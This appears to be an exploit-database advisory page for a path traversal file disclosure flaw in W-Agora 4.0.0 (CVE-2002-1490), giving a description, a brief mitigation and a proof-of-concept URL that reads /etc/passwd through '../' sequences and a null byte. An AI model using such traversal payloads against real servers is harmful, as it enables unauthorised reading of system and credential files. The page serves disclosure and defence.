header-logo
Suggest Exploit
vendor:
W-Agora
by:
SecurityFocus
7.5
CVSS
HIGH
File Disclosure Vulnerability
22
CWE
Product Name: W-Agora
Affected Version From: W-Agora 4.0.0
Affected Version To: W-Agora 4.0.0
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: a:w-agora:w-agora:4.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

A file disclosure vulnerability has been reported for W-Agora

An attacker can construct a URL consisting of dot-dot-slash (../) character sequences to obtain access to files outside of the document root. It should be noted that only files accessible by the web server will be disclosed to the attacker.

Mitigation:

Ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6595/info
 
A file disclosure vulnerability has been reported for W-Agora. It has been reported that W-Agora does not adequately sanitize some user-supplied input.
 
An attacker can construct a URL consisting of dot-dot-slash (../) character sequences to obtain access to files outside of the document root. It should be noted that only files accessible by the web server will be disclosed to the attacker. 

http://target/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1

Navigation

Suggest Exploit

Services By CQR